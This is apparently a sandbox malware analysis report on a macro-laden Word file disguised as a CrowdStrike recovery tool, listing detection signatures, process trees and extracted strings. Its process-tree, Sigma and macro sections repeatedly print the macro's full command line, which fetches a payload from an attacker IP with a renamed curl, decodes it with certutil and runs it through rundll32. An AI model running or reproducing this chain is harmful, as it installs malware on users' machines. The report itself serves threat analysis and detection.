Edit tour

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID:	1478411
MD5:	dd2100dfa067caae416b885637adc4ef
SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags:	docm
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document exploit detected (process start blacklist hit)

Downloads suspicious files via Chrome

Machine Learning detection for dropped file

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Microsoft Office Child Process

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Found potential string decryption / allocating functions

IP address seen in connection with other malware

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1384 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cmd.exe (PID: 300 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

xcopy.exe (PID: 3096 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)

certutil.exe (PID: 3112 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

certutil.exe (PID: 3128 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

curl.exe (PID: 3136 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

certutil.exe (PID: 3152 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

rundll32.exe (PID: 3160 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

chrome.exe (PID: 3236 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 3428 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 3224 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 300 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

WINWORD.EXE (PID: 300 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cmd.exe (PID: 3616 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

xcopy.exe (PID: 3644 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)

certutil.exe (PID: 3548 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

certutil.exe (PID: 3796 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

curl.exe (PID: 2432 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

certutil.exe (PID: 2724 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

rundll32.exe (PID: 2360 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Executable

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 3128, TargetFilename: C:\Users\user\AppData\Local\Temp\curl.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, SourceProcessId: 300, StartAddress: 772EA280, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 300

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit,

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit,

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash,	7_2_000000013F4D9BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	7_2_000000013F4D9C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C9C CryptHashData,	7_2_000000013F4D9C9C
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash,	22_2_000000013F359BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	22_2_000000013F359C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C9C CryptHashData,	22_2_000000013F359C9C

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_90c8dacc-4

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A2738 recv,WSAGetLastError,

7_2_000000013F4A2738

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

Jump to behavior

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sb-ssl.google.com

Source: unknown

HTTP traffic detected: POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: sb-ssl.google.comConnection: keep-aliveContent-Length: 1073Content-Type: application/octet-streamSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	String found in binary or memory: http://172.104.160.
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://aka.ms/WRH
Source: document.xml	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://azure.status.microsoft/status
Source: curl.exe	String found in binary or memory: https://curl.se/
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/P
Source: curl.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)			Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Document contains an embedded VBA macro with suspicious strings

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
